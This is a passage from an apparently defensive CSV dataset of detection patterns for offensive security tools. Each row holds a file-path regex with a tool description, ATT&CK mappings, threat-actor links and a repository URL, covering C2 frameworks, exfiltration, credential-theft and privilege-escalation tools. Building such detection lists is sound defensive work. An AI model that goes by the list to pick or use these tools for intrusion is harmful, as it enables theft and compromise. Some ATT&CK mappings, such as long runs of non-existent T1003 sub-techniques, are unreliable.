T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/ServerC2.cpp*",".{0,1000}\/ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/ServerC2.exe*",".{0,1000}\/ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/ServerlessRedirector.git*",".{0,1000}\/ServerlessRedirector\.git.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*/servers/dns_server.py*",".{0,1000}\/servers\/dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/icmp_server.py*",".{0,1000}\/servers\/icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/smb_server.py*",".{0,1000}\/servers\/smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/serverscan/CobaltStrike*",".{0,1000}\/serverscan\/CobaltStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/serverscan_Air*",".{0,1000}\/serverscan_Air.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/serverscan_pro*",".{0,1000}\/serverscan_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServerScanForLinux/*",".{0,1000}\/ServerScanForLinux\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServerScanForWindows/*",".{0,1000}\/ServerScanForWindows\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServerScanForWindows/PE*",".{0,1000}\/ServerScanForWindows\/PE.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServiceMove-BOF/*",".{0,1000}\/ServiceMove\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*/ServiceName:TokenDriver*",".{0,1000}\/ServiceName\:TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*/Services/TransitEXE.exe*",".{0,1000}\/Services\/TransitEXE\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/servicetags.nse*",".{0,1000}\/servicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SessionSearcher.exe*",".{0,1000}\/SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/SetNTLM.ps1*",".{0,1000}\/SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*/SetProcessInjection.git*",".{0,1000}\/SetProcessInjection\.git.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*/setuserpass.x64.*",".{0,1000}\/setuserpass\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/setuserpass.x86.*",".{0,1000}\/setuserpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/sfp_openphish.py*",".{0,1000}\/sfp_openphish\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sfp_spider.py*",".{0,1000}\/sfp_spider\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sh_executor/*.go*",".{0,1000}\/sh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/s-h-3-l-l/*",".{0,1000}\/s\-h\-3\-l\-l\/.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ShadowForgeC2*",".{0,1000}\/ShadowForgeC2.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*/ShadowSpray.exe*",".{0,1000}\/ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ShadowSpray.git*",".{0,1000}\/ShadowSpray\.git.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*/ShadowSpray/*.cs*",".{0,1000}\/ShadowSpray\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*/share/windows-resources/wce*",".{0,1000}\/share\/windows\-resources\/wce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*/share_enum.py*",".{0,1000}\/share_enum\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/ShareFinder.cs*",".{0,1000}\/ShareFinder\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/Sharefinder.ps1",".{0,1000}\/Sharefinder\.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/shares-with-SCF.txt*",".{0,1000}\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/SharpADWS.git*",".{0,1000}\/SharpADWS\.git.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*/SharpAllowedToAct.exe*",".{0,1000}\/SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - 